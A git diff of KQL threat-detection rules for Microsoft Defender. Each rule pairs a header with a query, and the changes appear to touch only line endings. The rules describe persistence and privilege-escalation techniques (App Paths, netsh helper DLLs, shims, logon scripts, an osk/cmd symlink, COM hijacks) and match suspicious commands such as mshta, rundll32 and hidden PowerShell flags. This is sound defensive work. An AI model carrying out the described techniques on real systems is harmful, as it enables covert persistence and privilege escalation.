+// Title: Potential Persistence Via App Paths Default Property
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
+// The entries found under App Paths are used primarily for the following purposes.
+// First, to map an application's executable file name to that file's fully qualified path.
+// Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
+// False Positives:
+// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
index 4eaac851..6a009776 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
@@ -1,14 +1,14 @@
-// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-01-01
-// Level: medium
-// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
-// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
-// This can be potentially abused as a persistence mechanism.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
-// False Positives:
-// - Legitimate applications making use of this feature for compatibility reasons
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-01
+// Level: medium
+// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
+// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
+// This can be potentially abused as a persistence mechanism.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate applications making use of this feature for compatibility reasons
+
+DeviceRegistryEvents
 | where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
index 63c6d8a9..eda54125 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via GlobalFlags
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018-04-11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via GlobalFlags
+// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
+// Date: 2018-04-11
+// Level: high
+// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql
index c278167e..71bd8e83 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Logon Scripts - CommandLine
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019-01-12
-// Level: high
-// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001
-// False Positives:
-// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools
-
-DeviceProcessEvents
+// Title: Potential Persistence Via Logon Scripts - CommandLine
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: high
+// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001
+// False Positives:
+// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
index 8f7b1c8c..4c95740d 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Logon Scripts - Registry
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019-01-12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement
-// False Positives:
-// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Logon Scripts - Registry
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: medium
+// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement
+// False Positives:
+// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
+
+DeviceRegistryEvents
 | where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
index ae1e326d..9f3c9138 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
@@ -1,11 +1,11 @@
-// Title: Potential Persistence Via Microsoft Compatibility Appraiser
-// Author: Sreeman
-// Date: 2020-09-29
-// Level: medium
-// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
-// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
-
-DeviceProcessEvents
+// Title: Potential Persistence Via Microsoft Compatibility Appraiser
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
+// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql
index 6b86162a..90311d71 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Netsh Helper DLL
-// Author: Victor Sergeev, oscd.community
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108
-
-DeviceProcessEvents
+// Title: Potential Persistence Via Netsh Helper DLL
+// Author: Victor Sergeev, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
index 41364086..5dd8c87f 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Netsh Helper DLL - Registry
-// Author: Anish Bogati
-// Date: 2023-11-28
-// Level: medium
-// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
-// False Positives:
-// - Legitimate helper added by different programs and the OS
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Netsh Helper DLL - Registry
+// Author: Anish Bogati
+// Date: 2023-11-28
+// Level: medium
+// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+// False Positives:
+// - Legitimate helper added by different programs and the OS
+
+DeviceRegistryEvents
 | where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
index dae58d0d..f38cc1af 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-04-05
-// Level: high
-// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+
+DeviceRegistryEvents
 | where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
index af65414b..d1ccd685 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via PlistBuddy
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-02-18
-// Level: high
-// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004
-
-DeviceProcessEvents
+// Title: Potential Persistence Via PlistBuddy
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: high
+// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql
index 6c70f9b8..2906d3aa 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Powershell Search Order Hijacking - Task
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022-04-08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Potential Persistence Via Powershell Search Order Hijacking - Task
+// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-08
+// Level: high
+// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
index 202552f7..2eba3e8e 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Scrobj.dll COM Hijacking
-// Author: frack113
-// Date: 2022-08-20
-// Level: medium
-// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-// False Positives:
-// - Legitimate use of the dll.
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Scrobj.dll COM Hijacking
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use of the dll.
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
index e2da4396..974e2b41 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Shim Database In Uncommon Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-01
-// Level: high
-// Description: Detects the installation of a new shim database where the file is located in a non-default location
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Shim Database In Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects the installation of a new shim database where the file is located in a non-default location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
index 0f6cc0ae..b7942226 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
@@ -1,13 +1,13 @@
-// Title: Potential Persistence Via Shim Database Modification
-// Author: frack113
-// Date: 2021-12-30
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
-// False Positives:
-// - Legitimate custom SHIM installations will also trigger this rule
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Shim Database Modification
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
index 1ef1cf25..40e96c35 100644
--- a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
+++ b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
@@ -1,10 +1,10 @@
-// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
-// Author: frack113
-// Date: 2022-12-11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008
-
-DeviceProcessEvents
+// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql
index a03fbb20..821d1b96 100644
--- a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql
+++ b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Process Injection Via Msra.EXE
-// Author: Alexander McDonald
-// Date: 2022-06-24
-// Level: high
-// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
-// False Positives:
-// - Legitimate use of Msra.exe
-
-DeviceProcessEvents
+// Title: Potential Process Injection Via Msra.EXE
+// Author: Alexander McDonald
+// Date: 2022-06-24
+// Level: high
+// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Legitimate use of Msra.exe
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
index 4fc7dbc5..ca605a3c 100644
--- a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
+++ b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
@@ -1,10 +1,10 @@
-// Title: Potential PSFactoryBuffer COM Hijacking
-// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
-// Date: 2023-06-07
-// Level: high
-// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-
-DeviceRegistryEvents
+// Title: Potential PSFactoryBuffer COM Hijacking
+// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
+// Date: 2023-06-07
+// Level: high
+// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
index c882c39b..51e89c61 100644
--- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
+++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
@@ -1,12 +1,12 @@
-// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger
-// Author: frack113
-// Date: 2022-08-07
-// Level: medium
-// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574
-// False Positives:
-// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
-
-DeviceRegistryEvents
+// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger
+// Author: frack113
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
index cc243a12..6c5eee3c 100644
--- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
+++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
@@ -1,13 +1,13 @@
-// Title: Potential Registry Persistence Attempt Via Windows Telemetry
-// Author: Lednyov Alexey, oscd.community, Sreeman
-// Date: 2020-10-16
-// Level: high
-// Description: Detects potential persistence behavior using the windows telemetry registry key.
-// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
-// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
-// The problem is, it will run any arbitrary command without restriction of location or type.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
-
-DeviceRegistryEvents
+// Title: Potential Registry Persistence Attempt Via Windows Telemetry
+// Author: Lednyov Alexey, oscd.community, Sreeman
+// Date: 2020-10-16
+// Level: high
+// Description: Detects potential persistence behavior using the windows telemetry registry key.
+// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+// The problem is, it will run any arbitrary command without restriction of location or type.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceRegistryEvents
